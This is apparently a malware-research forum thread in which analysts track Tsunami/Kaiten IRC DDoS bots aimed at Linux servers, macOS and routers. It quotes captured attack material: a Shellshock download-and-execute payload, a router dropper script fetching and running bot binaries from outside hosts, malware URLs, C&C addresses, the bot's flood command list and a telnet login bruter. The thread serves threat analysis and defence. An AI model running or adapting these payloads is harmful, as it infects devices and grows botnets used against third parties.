[unixfreaxjp]

More: https://www.virustotal.com/en/file/3caf ... 411856827/
#CNC: linksys,secureshellz,net Channel IRC = "#shellshock" < PoC of a designed for ShellShock event

Source: #shellshock attack payloads:

Code: Select all

wget http://stablehost.us/bots/a -O /tmp/a;
curl -o /tmp/a http://stablehost.us/bots/a;
chmod +x /tmp/a;
/tmp/a; 

IRC server:

Code: Select all

#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apache2" // What you want this to hide as
#define CHAN "#shellshock" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=1; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
"linksys.secureshellz.net",
(void*)0
}; 

[unixfreaxjp]

Same series as previous, but guess what?? MAc OS X Mach-O binary in x64!!
VT: https://www.virustotal.com/en/file/61c4 ... 411856542/
Same CNC, the #shellshock payload

[unixfreaxjp]

The Tsunami (kaiten)'s "pan" attack is completely revealed, the function's source code was snagged successfully.
Attached is the function's source code, not the whole code.
Shared ONLY to the legit members (which its security we trust is handled by kernelmode management),
for the purpose to mitigate this attack method.

#MalwareMustDie!

[K_Mikhail]

_http://128.199.179.103/private/auto/xtk-ppc-auto
_http://128.199.179.103/private/auto/xtk-mips-auto
_http://128.199.179.103/private/auto/xtk-mipsel-auto
_http://128.199.179.103/private/auto/xtk-x64-auto
_http://128.199.179.103/private/auto/xtk-arm-auto

x86 is absent.

[unixfreaxjp]

Spotting skids lair with old museum samples..thinking three times before deciding to share here..

https://www.virustotal.com/en/file/de5b ... 413070953/
https://www.virustotal.com/en/file/0732 ... 343929536/
https://www.virustotal.com/en/file/0a32 ... 413293556/
Compiled well for each kernel version, .. 2.7? lol..outdated.

[malwarelabs]

Good old Tsunami
Vector: SSH bruteforce:

Code: Select all

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
#
# LEGAL DISCLAIMER: It is the end user's responsibility to obey 
# all applicable local, state and federal laws. Developers assume 
# no liability and are not responsible for any misuse or damage 
# caused by this program.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
#
# LEGAL DISCLAIMER: It is the end user's responsibility to obey 
# all applicable local, state and federal laws. Developers assume 
# no liability and are not responsible for any misuse or damage 
# caused by this program.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="hXXp://freshtoastmafia.com"
# NAME OF BINARIES:
REFERENCE_MIPSEL="3"
REFERENCE_MIPS="2"
REFERENCE_SUPERH="5"
REFERENCE_ARM="1"
REFERENCE_PPC="4"
rm -fr /var/run/${REFERENCE_MIPSEL} \
	/var/run/${REFERENCE_MIPS} \
	/var/run/${REFERENCE_SUPERH} \
	/var/run/${REFERENCE_ARM} \
	/var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
sleep 3;
rm -fr /var/run/getbinaries.sh

hXXp://freshtoastmafia.com -> "NAZI BOOTER" admin : hXXps://twitter.com/ispdestroyer
C&C 80.82.75.56:6667
attached

[unixfreaxjp]

Too modified, not good. Must make some new memo here. IRC cnc server (plain) & ports (hashed) are well seen as usual in the bins..I go with interesting points only.. Sample:
https://www.virustotal.com/en/file/26ac ... 448201213/
https://www.virustotal.com/en/file/ec6b ... 448201238/
Installer:

shell pong:

Code: Select all

$ echo -e "\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n\r\n"
binfagt'

new help:

Code: Select all

NOTICE %s :PAN <target> <port> <secs>\n
NOTICE %s :Panning %s.\n 
NOTICE %s :TSUNAMI <target> <secs>\n 
NOTICE %s :Tsunami heading for %s.\n 
NOTICE %s :UNKNOWN <target> <secs>\n 
NOTICE %s :Unknowning %s.\n
NOTICE %s :MOVE <server>\n 
NOTICE %s :TSUNAMI <target> <secs>= Special packeter that wont be blocked by most firewalls\n
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n
NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n
NOTICE %s :NTP <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time> = A NTP flooder\n 
NOTICE %s :UNKNOWN <target> <secs>= Another non-spoof udp flooder\n
NOTICE %s :SCAN= TheMaTriX Telnet Spreader\n 
NOTICE %s :HTTPFLOOD <IP> <HOST> <METHOD> <PAGE> <TIME>= TheMaTriX HTTP FLOODER\n
NOTICE %s :NICK <nick>= Changes the nick of the client\n 
NOTICE %s :SERVER <server>= Changes servers\n
NOTICE %s :GETSPOOFS= Gets the current spoofing\n
NOTICE %s :SPOOFS <subnet>= Changes spoofing to a subnet\n 
NOTICE %s :DISABLE= Disables all packeting from this client\n
NOTICE %s :ENABLE = Enables all packeting from this client\n 
NOTICE %s :KILL = Kills the client\n 
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n
NOTICE %s :VERSION= Requests version of client\n 
NOTICE %s :KILLALL= Kills all current packeting\n
NOTICE %s :HELP = Displays this\n
NOTICE %s :IRC <command>= Sends this command to the server\n 
NOTICE %s :SH <command> = Executes a command\n 

Wide varierty of the used user-agent for Ddos attack:

Pan flood attack:

NTP flood attack:

Most important new thing is this telnet scanner:

just saying:

Code: Select all

0x8048A96 mov     dword ptr [esp+4], offset aR ; "r"
0x8048A9E mov     dword ptr [esp], offset aUsrDictWords ; "/usr/dict/words"
0x8048AA5 call    fopen
0x8048AAA mov     [ebp+var_14], eax
0x8048AAD cmp     [ebp+var_14], 0

and..

Code: Select all

NOTICE #Daddy2 :[+] Cracked IP %s with login %s:%s\n 

#MalwareMustDie / @unixfreaxjp

[malware.monna]

Here is the analysis of Tsunami sample (its old sample) using Limon sandbox.

http://malware-unplugged.blogspot.in/20 ... linux.html

attached is the sample, password: infected

[wiseman]

Most important new thing is this telnet scanner:

just saying:

Code: Select all

0x8048A96 mov     dword ptr [esp+4], offset aR ; "r"
0x8048A9E mov     dword ptr [esp], offset aUsrDictWords ; "/usr/dict/words"
0x8048AA5 call    fopen
0x8048AAA mov     [ebp+var_14], eax
0x8048AAD cmp     [ebp+var_14], 0

and..

Code: Select all

NOTICE #Daddy2 :[+] Cracked IP %s with login %s:%s\n 

#MalwareMustDie / @unixfreaxjp

That's hardly a major improvement over the existing Kaiten. I mean, when you consider that the vast majority of modern *nixes don't even come with telnet out of the box any more...
It's more likely to be a threat against routers or other small embedded devices, but then that'd involve compiling a bunch of different kaitens, etc etc, and with the router malware world heating up with gayfgt and LightAidra and the .xs malware, I can't imagine it's a big deal.
I haven't looked at it yet, but if it's just posting the login details as opposed to auto-spreading, then that's also not a huge risk.
I guess he might be able to own a few unusual embedded devices out there, but if he's using Kaiten in this day and age then he's really only a threat to himself.

[unixfreaxjp]

I don't know who you are. But thank's for the sharing of thought, appreciate it.

Most important new thing is this telnet scanner...

That's hardly a major improvement over the existing Kaiten. .

Oh, I agreed with you perfectly, and I didn't say majorly improved, but they added services bruter/scanner to aim the right spot after all, this I also spotted ones with the SSH bruter too, which is why I called it "important new thing".
IoT weakness of "this and that" made new vectors of "this and that" are seen and aimed. some devices are targeted with this now, and they are compiled in many variants.

I guess he might be able to own a few unusual embedded devices out there, but if he's using Kaiten in this day and age then he's really only a threat to himself.

As I jumped within its irc CNC and into some "ugly environment" to trail ELF threat/actors closely. Sadly, I saw hundreds (maybe to couple thousands nodes tops in overall total of groups that's using it like lizard-stresser, kaitenbbot, etc) of DDOS botnets are into routers now, because they have generic flaw. I may say it is close to 50-50 amount of old machines/VPS *vs*the router ones. They use routers/IoT to brute each others' login pwd now and this is the escalation factor that needed to be aware.

So it's not a few anymore, and most of them are by kaiten family. Seriously it hits, not that I'm happy about it. For the code itself .. it grows..to new variants like you mentioned gayfgt (they call it lizkebab..it has at least 6 codes of the now), dtool, and some more. Those kiddos work hard to improve & expand their bruter/ddos service.
I shared its source codes and anything I can grab and distributed them into all security industry I can reach http://blog.malwaremustdie.org/2015/11/ ... osure.html